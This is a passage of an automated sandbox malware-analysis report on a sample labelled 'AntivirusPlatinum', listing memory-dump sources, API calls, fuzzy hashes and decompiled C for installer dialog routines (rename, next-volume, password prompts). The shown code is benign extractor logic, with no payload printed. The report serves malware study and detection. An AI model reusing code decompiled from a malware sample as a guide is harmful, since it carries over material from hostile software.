                                                                                                                                                      0x0040bc1c
                                                                                                                                                      0x0040bc0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc0e
                                                                                                                                                      0x0040bc11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc11
                                                                                                                                                      0x0040bc4c
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogParam
                                                                                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 665744214-56093855
                                                                                                                                                      • Opcode ID: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                      • Instruction ID: 33d4027af350ab9e8ad30dbbcb82d9e90b0d9a51744802c5390a1546dc0066f1
                                                                                                                                                      • Opcode Fuzzy Hash: ece71fc73592af66301a70e679c12dd9b2103662e6c74d0171aeeb951f2b0c10
                                                                                                                                                      • Instruction Fuzzy Hash: 0B213A30158349ABEB12CF14EC10BD63FA0EB15344F188076E945AA3E1CBB9AD50DBAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E0040B193(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				CHAR* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                      				_t23 = _a16;
                                                                                                                                                      				E0040309D(_t22, _t21, _a8, _a12, _t23, "RENAMEDLG", 0, 0);
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					 *0x41f320 = _t23;
                                                                                                                                                      					SetDlgItemTextA(_t21, 0x65, _t23);
                                                                                                                                                      					SetDlgItemTextA(_t21, 0x66, _t23);
                                                                                                                                                      					L9:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t17 == 0) {
                                                                                                                                                      					SendDlgItemMessageA(_t21, 0x66, 0xd, 0x50,  *0x41f320);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L6:
                                                                                                                                                      					EndDialog(_t21, ??);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t17 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L6;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}








                                                                                                                                                      0x0040b197
                                                                                                                                                      0x0040b19c
                                                                                                                                                      0x0040b1b0
                                                                                                                                                      0x0040b1b8
                                                                                                                                                      0x0040b1bd
                                                                                                                                                      0x0040b1fb
                                                                                                                                                      0x0040b201
                                                                                                                                                      0x0040b207
                                                                                                                                                      0x0040b209
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b20b
                                                                                                                                                      0x0040b1c0
                                                                                                                                                      0x0040b1cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1cc
                                                                                                                                                      0x0040b1c6
                                                                                                                                                      0x0040b1c7
                                                                                                                                                      0x0040b1e7
                                                                                                                                                      0x0040b1ed
                                                                                                                                                      0x0040b1d1
                                                                                                                                                      0x0040b1d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1d2
                                                                                                                                                      0x0040b1ca
                                                                                                                                                      0x0040b1d0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1d0
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040B1D2
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,0000000D,00000050,?), ref: 0040B1E7
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B201
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B207
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Text$DialogMessageSend
                                                                                                                                                      • String ID: RENAMEDLG
                                                                                                                                                      • API String ID: 1109518134-3299779563
                                                                                                                                                      • Opcode ID: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                      • Instruction ID: 19bae5b26799f046c8e57332e4b758996fbe75a27c9b904ad18449bb2b017feb
                                                                                                                                                      • Opcode Fuzzy Hash: f0ac5b148682c27e8b841de141a9e01bb37ae873fefba3ba11adc6c704d29104
                                                                                                                                                      • Instruction Fuzzy Hash: 9A01B172240219B6D7205F669C49EAB3F2CEB497A1F004426BA19B90C1C2BA8421D7FC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406C6F(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				long _t26;
                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t7 = _a8 - 1;
                                                                                                                                                      				_t27 = _a4;
                                                                                                                                                      				_t26 = _a16;
                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                      					E00406BCC(__ebx, GetWindowLongA(_t27, 0xffffffeb), __eflags, _t27);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t11 = _t7 - 1;
                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                      						E004064B3(GetWindowLongA(_t27, 0xffffffeb));
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = _t11 - 3;
                                                                                                                                                      						if(_t14 == 0) {
                                                                                                                                                      							E004064E2(GetWindowLongA(_t27, 0xffffffeb), _t26 & 0x0000ffff, _t26 >> 0x10);
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_t14 == 0x7c) {
                                                                                                                                                      								SetWindowLongA(_t27, 0xffffffeb,  *_t26);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return DefWindowProcA(_t27, _a8, _a12, _t26);
                                                                                                                                                      			}








                                                                                                                                                      0x00406c75
                                                                                                                                                      0x00406c77
                                                                                                                                                      0x00406c7b
                                                                                                                                                      0x00406c7e
                                                                                                                                                      0x00406cd4
                                                                                                                                                      0x00406c80
                                                                                                                                                      0x00406c80
                                                                                                                                                      0x00406c81
                                                                                                                                                      0x00406cc1
                                                                                                                                                      0x00406c83
                                                                                                                                                      0x00406c83
                                                                                                                                                      0x00406c86
                                                                                                                                                      0x00406caf
                                                                                                                                                      0x00406c88
                                                                                                                                                      0x00406c8b
                                                                                                                                                      0x00406c92
                                                                                                                                                      0x00406c92
                                                                                                                                                      0x00406c8b
                                                                                                                                                      0x00406c86
                                                                                                                                                      0x00406c81
                                                                                                                                                      0x00406cea

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long$Proc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3468714886-0
                                                                                                                                                      • Opcode ID: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                      • Instruction ID: 61735104a588f96fdd1966c9f8756a4b7932e2efd5c0c580c1dd5b3652aebea8
                                                                                                                                                      • Opcode Fuzzy Hash: 1b70b1437c5452307bdbe11857104811a4f517da2f4235cb28a3aaf30c274c68
                                                                                                                                                      • Instruction Fuzzy Hash: D0018435108024B7DF055F69AE18CAF3B68DE99330712462AF513F22E0C679993196AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040DF79(void* __ebx, signed int* __ecx, FILETIME* _a4) {
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                      				struct _SYSTEMTIME _v36;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				signed int _t50;
                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                      				signed int* _t57;
                                                                                                                                                      
                                                                                                                                                      				_t57 = __ecx;
                                                                                                                                                      				FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                                      				FileTimeToSystemTime( &_v12,  &_v36);
                                                                                                                                                      				_t34 = _v36.wDay & 0x0000ffff;
                                                                                                                                                      				_t50 = _v36.wMonth & 0x0000ffff;
                                                                                                                                                      				_t51 = _v36.wYear & 0x0000ffff;
                                                                                                                                                      				_t57[3] = _v36.wHour & 0x0000ffff;
                                                                                                                                                      				_t57[2] = _t34;
                                                                                                                                                      				_t57[4] = _v36.wMinute & 0x0000ffff;
                                                                                                                                                      				_t57[8] = _t34 - 1;
                                                                                                                                                      				_t57[5] = _v36.wSecond & 0x0000ffff;
                                                                                                                                                      				_t37 = 1;
                                                                                                                                                      				 *_t57 = _v36.wYear & 0x0000ffff;
                                                                                                                                                      				_t57[1] = _t50;
                                                                                                                                                      				_t57[7] = _v36.wDayOfWeek & 0x0000ffff;
                                                                                                                                                      				if(_t50 > 1) {
                                                                                                                                                      					_t56 = 0x4140ec;
                                                                                                                                                      					do {
                                                                                                                                                      						_t57[8] = _t57[8] +  *_t56;
                                                                                                                                                      						_t37 = _t37 + 1;
                                                                                                                                                      						_t56 = _t56 + 4;
                                                                                                                                                      					} while (_t37 < _t50);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t50 > 2 && E0040DF44(_t51) != 0) {
                                                                                                                                                      					_t57[8] = _t57[8] + 1;
                                                                                                                                                      				}
                                                                                                                                                      				_v36.wMilliseconds = 0;
                                                                                                                                                      				SystemTimeToFileTime( &_v36,  &_v20);
                                                                                                                                                      				_t57[6] = _v12.dwLowDateTime - _v20.dwLowDateTime;
                                                                                                                                                      				return _t57;
                                                                                                                                                      			}











                                                                                                                                                      0x0040df88
                                                                                                                                                      0x0040df8a
                                                                                                                                                      0x0040df98
                                                                                                                                                      0x0040dfa2
                                                                                                                                                      0x0040dfa6
                                                                                                                                                      0x0040dfaa
                                                                                                                                                      0x0040dfae
                                                                                                                                                      0x0040dfb5
                                                                                                                                                      0x0040dfb8
                                                                                                                                                      0x0040dfc0
                                                                                                                                                      0x0040dfc5
                                                                                                                                                      0x0040dfcc
                                                                                                                                                      0x0040dfcd
                                                                                                                                                      0x0040dfcf
                                                                                                                                                      0x0040dfd2
                                                                                                                                                      0x0040dfd7
                                                                                                                                                      0x0040dfd9
                                                                                                                                                      0x0040dfdf
                                                                                                                                                      0x0040dfe1
                                                                                                                                                      0x0040dfe4
                                                                                                                                                      0x0040dfe5
                                                                                                                                                      0x0040dfe8
                                                                                                                                                      0x0040dfec
                                                                                                                                                      0x0040dff0
                                                                                                                                                      0x0040dffc
                                                                                                                                                      0x0040dffc
                                                                                                                                                      0x0040e001
                                                                                                                                                      0x0040e00d
                                                                                                                                                      0x0040e01a
                                                                                                                                                      0x0040e021

                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local
                                                                                                                                                      • String ID: @A
                                                                                                                                                      • API String ID: 2859370177-361999007
                                                                                                                                                      • Opcode ID: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                      • Instruction ID: 1aaad987808f3aa0f3819d0692f069d438d8aa74b184443fbbc98788e9bd99ff
                                                                                                                                                      • Opcode Fuzzy Hash: 89950de3dffe1bcad7401ddb42f8c5d8fd6609ab17a9cf8c41317c6ad1f43135
                                                                                                                                                      • Instruction Fuzzy Hash: 4B212CB5D0021A9BCB64DFA9C8408FFFBF9FE48701B00852BE596E3640E3749554CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                      			E0040B3DA(void* __ecx, void* __edx, struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                      				CHAR* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t27 = _a16;
                                                                                                                                                      				_t26 = _a4;
                                                                                                                                                      				E0040309D(__edx, _t26, _a8, _a12, _t27, "ASKNEXTVOL", 0, 0);
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					 *0x41f324 = _t27;
                                                                                                                                                      					_push(_t27);
                                                                                                                                                      					L12:
                                                                                                                                                      					SetDlgItemTextA(_t26, 0x65, ??);
                                                                                                                                                      					L13:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t16 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t16 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t26, 0x65,  *0x41f324, 0x400);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L9:
                                                                                                                                                      					EndDialog(_t26, ??);
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				_t19 = _t16 - 1;
                                                                                                                                                      				if(_t19 == 0) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t19 == 0x64) {
                                                                                                                                                      					_t21 = E004073DB( *0x41f324);
                                                                                                                                                      					if(E00402854(_t26, E004098F7(0x7b),  *0x41f324, _t21, 0) == 0) {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					_push( *0x41f324);
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      				goto L5;
                                                                                                                                                      			}









                                                                                                                                                      0x0040b3de
                                                                                                                                                      0x0040b3e2
                                                                                                                                                      0x0040b3f6
                                                                                                                                                      0x0040b3fe
                                                                                                                                                      0x0040b403
                                                                                                                                                      0x0040b46c
                                                                                                                                                      0x0040b472
                                                                                                                                                      0x0040b473
                                                                                                                                                      0x0040b476
                                                                                                                                                      0x0040b47c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b47e
                                                                                                                                                      0x0040b406
                                                                                                                                                      0x0040b417
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b417
                                                                                                                                                      0x0040b40c
                                                                                                                                                      0x0040b40d
                                                                                                                                                      0x0040b462
                                                                                                                                                      0x0040b468
                                                                                                                                                      0x0040b44b
                                                                                                                                                      0x0040b44c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b44c
                                                                                                                                                      0x0040b40f
                                                                                                                                                      0x0040b410
                                                                                                                                                      0x0040b449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b449
                                                                                                                                                      0x0040b415
                                                                                                                                                      0x0040b423
                                                                                                                                                      0x0040b43f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b441
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b441
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$Dialog
                                                                                                                                                      • String ID: ASKNEXTVOL
                                                                                                                                                      • API String ID: 1770891597-3402441367
                                                                                                                                                      • Opcode ID: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                      • Instruction ID: ec2075d0238c7e63290f5753f8087d9ea159937018a848bc657c4fc681144771
                                                                                                                                                      • Opcode Fuzzy Hash: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                      • Instruction Fuzzy Hash: E1118631144105BAD7116F619D09FBB3B78DB45B05F008036FB11B51D3C7B99922E7AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004027E5
                                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,?), ref: 00402820
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BrowseFolderMalloc
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 3812826013-3554254475
                                                                                                                                                      • Opcode ID: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                      • Instruction ID: 12db1c29d20bd6851e06055d48ea0fd08f2e62197319b2c166d741977c5f3b3f
                                                                                                                                                      • Opcode Fuzzy Hash: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                      • Instruction Fuzzy Hash: 8F012D76900219AFCF00DFA4C909BEF7BF8AF49311F104566E905E7284D778DA15DBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E0040B213(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				struct HWND__* _t22;
                                                                                                                                                      
                                                                                                                                                      				_t22 = _a4;
                                                                                                                                                      				E0040309D(_t21, _t22, _a8, _a12, _a16, "GETPASSWORD1", 0, 0);
                                                                                                                                                      				_t10 = _a8 - 0x110;
                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                      					SetDlgItemTextA(_t22, 0x66, _a16);
                                                                                                                                                      					L9:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t10 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t17 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t22, 0x65, 0x419ee8, 0x80);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L6:
                                                                                                                                                      					EndDialog(_t22, ??);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t17 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L6;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}







                                                                                                                                                      0x0040b217
                                                                                                                                                      0x0040b22d
                                                                                                                                                      0x0040b235
                                                                                                                                                      0x0040b23a
                                                                                                                                                      0x0040b275
                                                                                                                                                      0x0040b27b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b27d
                                                                                                                                                      0x0040b23d
                                                                                                                                                      0x0040b249
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b249
                                                                                                                                                      0x0040b243
                                                                                                                                                      0x0040b244
                                                                                                                                                      0x0040b265
                                                                                                                                                      0x0040b26b
                                                                                                                                                      0x0040b24f
                                                                                                                                                      0x0040b250
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b250
                                                                                                                                                      0x0040b247
                                                                                                                                                      0x0040b24d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b24d
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$Dialog
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 1770891597-3292211884
                                                                                                                                                      • Opcode ID: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                      • Instruction ID: 3f68c6a8021282f0a6222af1267fc3a11be894f7b34df5c1b4352459bfe538a6
                                                                                                                                                      • Opcode Fuzzy Hash: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                      • Instruction Fuzzy Hash: 71F04431284619BADB119FA09D0DFEF3614EB15741F108466F701F90D0C7F9996197AE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406CED(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                      				struct _WNDCLASSEXA _v52;
                                                                                                                                                      				short _t17;
                                                                                                                                                      				intOrPtr* _t18;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      
                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                      				_t18 = __ecx;
                                                                                                                                                      				_v52.cbSize = 0x30;
                                                                                                                                                      				_v52.style = 0x828;
                                                                                                                                                      				_v52.lpfnWndProc = E00406C6F;
                                                                                                                                                      				_v52.cbClsExtra = 0;
                                                                                                                                                      				_v52.cbWndExtra = 0;
                                                                                                                                                      				_v52.hInstance = _t21;
                                                                                                                                                      				_v52.hIcon = 0;
                                                                                                                                                      				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                      				_v52.hbrBackground = 6;
                                                                                                                                                      				_v52.lpszMenuName = 0;
                                                                                                                                                      				_v52.lpszClassName = "RarHtmlClassName";
                                                                                                                                                      				_v52.hIconSm = 0;
                                                                                                                                                      				_t17 = RegisterClassExA( &_v52);
                                                                                                                                                      				 *_t18 = _t21;
                                                                                                                                                      				return _t17;
                                                                                                                                                      			}







                                                                                                                                                      0x00406cf5
                                                                                                                                                      0x00406d01
                                                                                                                                                      0x00406d03
                                                                                                                                                      0x00406d0a
                                                                                                                                                      0x00406d11
                                                                                                                                                      0x00406d18
                                                                                                                                                      0x00406d1b
                                                                                                                                                      0x00406d1e
                                                                                                                                                      0x00406d21
                                                                                                                                                      0x00406d2a
                                                                                                                                                      0x00406d31
                                                                                                                                                      0x00406d38
                                                                                                                                                      0x00406d3b
                                                                                                                                                      0x00406d42
                                                                                                                                                      0x00406d45
                                                                                                                                                      0x00406d4c
                                                                                                                                                      0x00406d51

                                                                                                                                                      APIs
                                                                                                                                                      • LoadCursorA.USER32 ref: 00406D24
                                                                                                                                                      • RegisterClassExA.USER32(00000030), ref: 00406D45
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
